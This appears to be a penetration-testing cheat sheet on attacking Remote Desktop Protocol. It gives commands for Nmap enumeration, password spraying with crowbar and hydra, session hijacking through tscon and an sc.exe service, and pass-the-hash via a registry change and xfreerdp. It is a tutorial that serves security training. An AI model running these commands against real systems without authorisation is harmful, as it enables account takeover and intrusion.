RDP - Remote Desktop Protocol
This section will cover ways to attack Remote Desktop Protocol (RDP).
Table of Contents
- Overview
- Enumeration
- Nmap
- Connection
- xfreerdp
- rdesktop
- remmina
- Exploitation
- Password Spraying
- Session Hijacking
- Pass-the-Hash (PtH)
Overview
RDP isa proprietary protocol developed by Microsoft. It can provide a graphical interface to connect to another computer over the network.
By default, RDP uses TCP port 3389.
As RDP uses user credentials for authentication, it can be susceptible to attacks such as password spraying and brute force attacks. There can be times where no password is required for login.
Enumeration
There are several tools that can be used to enumerate RDP.
This section will cover the following tools:
- Nmap
Nmap
We can use the following command to target port 3389 assuming RDP is running on that port.
nmap -sV -Pn -p 3389 <Target IP>
Command breakdown:
-sV- Scan the version of the service.-Pn- Disable ping scan.-p 3389- Specify the port to scan.<Target IP>- Specify the target IP address.
Connection
There are different tools that we can use to connect to RDP both on Linux and Windows. On Windows, we can use the built in RDP client while we can use tools such as xfreerdp, rdesktop, or remmina to connect to Windows machines using RDP on Linux.
xfreerdp
The following command can be used to establish a connection using xfreerdp.
xfreerdp /v:<Target IP> /u:<username> /p:<password>
Command breakdown:
/v:<Target IP>- Specify the target IP address./u:<username>- Specify the username to use for authentication./p:<password>- Specify the password to use for authentication.
If the account is a domain account, we can use the /d:<domain> option alongside the above.
We can also transfer files to and from using xfreerdp.
xfreerdp /v:<Target IP> /d:<domain> /u:<username> /p:<password> /drive:linux,/path/to/directory/here
Command breakdown:
/v:<Target IP>- Specify the remote machine IP address./d:<domain>- Specify the domain name./u:<username>- Specify the username to authenticate as./p:<password>- Specify the password to authenticate as./drive:linux,/path/to/directory/here- Maps the specified local directory to a drive calledlinuxon the remote machine.
rdesktop
The following command can be used to establish a connection using rdesktop.
rdesktop <Target IP> -d <domain> -u <username> -p '<password>'
Command breakdown:
<IP>- IP address of the target.-d <domain>- Specify the domain of the remote machine.-u <username>- Specify the username to login as.-p '<password>'- Specify the password to use to authenticate.
We can use the following command to transfer files to and from the target using rdesktop.
rdesktop <Target IP> -d <domain> -u <username> -p '<password>' -r disk:linux='/path/to/local/dir'
Command breakdown:
<IP>- IP address of the target.-d <domain>- Specify the domain of the remote machine.-u <username>- Specify the username to login as.-p '<password>'- Specify the password to use to authenticate.-r disk:linux='/path/to/local/dir- Specify the drive name on Windows and the local path to share on the attacker's machine.
remmina
To use remmina, we can simply use the GUI and provide the target IP address, username, and password. Optionally, if the user account is part of a domain, we can specify the domain.
Exploitation
There are many tools and methods that can be used to perform various attacks on RDP.
This section will cover the following attacks:
- Password Spraying
- Session Hijacking
- Pass-the-Hash (PtH)
Password Spraying
Password spraying is where an attacker uses a list of usernames and attempts to use a single or multiple known passwords against the list of usernames to attempt to get a valid login.
This section will cover the following tools:
- Crowbar
- Hydra
Crowbar:
crowbar -b rdp -s <Target IP>/32 -U <username wordlist> -c '<password>'
Command breakdown:
-b rdp- Specify the protocol to brute force to be RDP.-s <Target IP>/32- Specify the target IP address with the CIDR notation.-U <username wordlist>- Specify the username wordlist to use.-c '<password>'- Specify the password to use for authentication.
Hydra:
hydra -L <username wordlist> -p '<password>' <Target IP> rdp
Command breakdown:
-L <username wordlist>- Specify the username wordlist to use.-p '<password>'- Specify the password to use for authentication.<Target IP>- Specify the target IP address.rdp- Specify the protocol to attack.
Session Hijacking
If there are multiple users logged in, we can attempt to Hijack a user's session. To Hijack a session without a password, we will require SYSTEM privileges and use the tscon.exe binary from Microsoft. The tscon.exe binary allows us to connect to another desktop session.
We will need to provide the session ID and name for the target user to hijack. To check, we can use the query user in PowerShell to obtain the information needed.
Once we have the required information, we can use the following command from command prompt.
tscon #<Target Session ID> /dest:#<Attacker Session Name>
Command breakdown:
#<Target Session ID>- Specify the session ID of the target to hijack./dest:#<Attacker Session Name>- Specify our current session name.
An example will be:
tscon #4 /dest:#rdp-tcp#13
If we have local administrator privileges, we can use sc.exe binary to create a Windows service. We will need to provide the service name and binary path (the command to execute).
sc.exe create <service name> binpath= "cmd.exe /k tscon <Session ID> /dest:<Attacker Session Name>"
Command breakdown:
create <service name>- Specify to create a service with the specified name.binpath =cmd.exe /k tscon- Specify to use thetscon.exebinary.<session ID>- Specify the session ID of the target to Hijack./dest:<Attacker Session Name>- Specify our current session name.
Once done, we can use the following command to start the created service.
net start <service name>
Note: This method does not work in Windows Server 2019 and later.
Pass-the-Hash (PtH)
We can also provide a hash if we are unable to crack it. The hash can be obtained using different methods such as dumping the SAM database or using Mimikatz. View the "Windows Password Attacks" page for more information on this.
A caveat is Restricted Admin Mode, which is disabled by default must be enabled. Otherwise, we will be given an error when attempting this attack.
To enable it, we can add a new registry key called DisableRestrictedAdmin (REG_DWORD) under the HKY_LOCAL_MACHINE\System\CurrentControlSet\Lsa using the following command.
reg add HKLM\System\CurrentCOntrolSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Once added, we can use xfreerdp with the /pth: option.
xfreerdp /v:<Target IP> /u:<username> /pth:<hash>
Command breakdown:
/v:<Target IP>- Specify the target IP address./u:<username>- Specify the username to use for authentication./pth:<hash>- Specify the hash to use for authentication.